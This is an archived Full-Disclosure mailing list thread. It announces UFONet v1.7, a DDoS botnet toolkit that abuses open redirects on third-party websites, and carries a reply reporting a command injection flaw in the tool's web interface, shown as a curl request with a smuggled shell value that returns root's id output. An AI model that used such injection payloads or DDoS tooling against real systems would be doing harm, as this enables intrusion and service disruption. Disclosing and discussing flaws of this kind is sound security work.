lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Fri, 16 Jul 2021 14:43:41 +0200
From: psy <epsylon@...eup.net>
To: Pierre Kim <pierre.kim.sec@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD]
 New Release: UFONet v1.7 - "KRäK!eN"...



On 16/7/21 13:06, Pierre Kim wrote:
> Hi,

Hi UFOmmander!

> Attention to all motherships, borgs have been detected inside a
> blackhole. Brace yourself for the impact:
> 
>     $ curl "http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'"
>     $ cat /tmp/plop
>     uid=0(root) gid=0(root) groups=0(root)
> 
> Energy shield levels critical! Enemies detected on the deck. Immediate
> response needed!

Hahahaha.... That teleportation technology can be exploited by many
alien races in the galaxy, yes, but it will depend a lot on the pilot
experiencies and in the environment in which the aircraft has been built.

Some use transparent proxies to avoid going further in those techniques...

"""
$ curl
"http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
  <title>503 - Forwarding failure (Privoxy@...alhost)</title>
"""

Others simply do not launch the tool using the privileged user (root),
knowing that UFONet is designed to prompt you when required, for example
when creating certain network packages ...

> Can you request a CVE ?

Ahhaha, I don't think so...but, when to send the solution with the piece
of code already fixed?..

Ouch! {troll}

> Best regards,

Thank you very much for the report and for doing it in such a funny
tone... ;-)

> - Captain Alex Torres and Pilot Pierre Kim

Roger!. I will work on it!

> On 7/15/21, psy <epsylon@...eup.net> wrote:
>> Hi Community,
>>
>> I am glad to present a new release of this tool:
>>
>>   - https://ufonet.03c8.net
>>
>> ---------
>>
>> "UFONet is a free software, P2P and cryptographic -disruptive toolkit-
>> that allows to perform DoS and DDoS attacks; on the Layer 7 (APP/HTTP)
>> through the exploitation of Open Redirect vectors on third-party
>> websites to act as a botnet and on the Layer3 (Network) abusing the
>> protocol."
>>
>> "It also works as an encrypted DarkNET to publish and receive content by
>> creating a global client/server network."
>>
>> ---------
>>
>> Main options are:
>>
>>   * DDoS (botnet) + DoS
>>   * Auto-update
>>   * Clean code
>>   * Documentation with examples
>>   * Web/GUI Interface
>>   * Proxy to connect to 'zombies' (ex: tor)
>>   * Change HTTP Headers (User-Agent, Referer, Host...)
>>   * Configure requests (Timeout, Retries, Delay, Threads...)
>>   * Search for 'zombies' on different search engines
>>   * Test vulnerabilities on 'zombies'
>>   * Download/Upload 'zombies' from/to others
>>   * Inspect a target (HTML objects sizes)
>>   * Set a place to 'bite' on a target (ex: big file)
>>   * Control number of rounds to attack
>>   * Apply cache evasion techniques
>>   * Advanced queries (ex: Verb tunneling exploitation)
>>   * Supports GET/POST
>>   * Multithreading
>>   * Order 'zombies' to attack you for benchmarking
>>   * Geomapping / Visual data
>>   * [...]
>>
>> This release (v1.7) called "/KRäK!eN/" has added this new features:
>>
>>   * Bugfixing
>>   * Added: "Deploy"
>>   * Added: "SHIP.TV"
>>   * Added: "Nodes"
>>   * Modified/Updated: Web/GUI
>>   * Updated Documentation
>>   * Updated FAQ (offline/online)
>>   * Updated Website
>>   * [...]
>>
>> ---------
>>
>> FAQ:
>>
>>   - https://ufonet.03c8.net/FAQ.html
>>
>> ---------
>>
>> Packages:
>>
>>   * [source]:
>>
>>   - https://code.03c8.net/epsylon/ufonet
>>
>>   * [mirror]:
>>
>>   - https://github.com/epsylon/ufonet
>>
>>   * [.zip]:
>>
>>   - https://ufonet.03c8.net/ufonet/ufonet-v1.7.zip
>>
>>   * [.tar.gz]:
>>
>>   - https://ufonet.03c8.net/ufonet/ufonet-v1.7.tar.gz
>>
>> -------------------------
>>
>> MEDIA:
>>
>>   * [Video] [07.2021] UFONet - "/KRäK!eN/":
>>
>>   - https://ufonet.03c8.net/ufonet/ufonet-kraken.ogv
>>
> 
> 

Download attachment "0xE79A8B84B2460A20.asc" of type "application/pgp-keys" (629 bytes)

Download attachment "signature.asc" of type "application/pgp-signature" (229 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ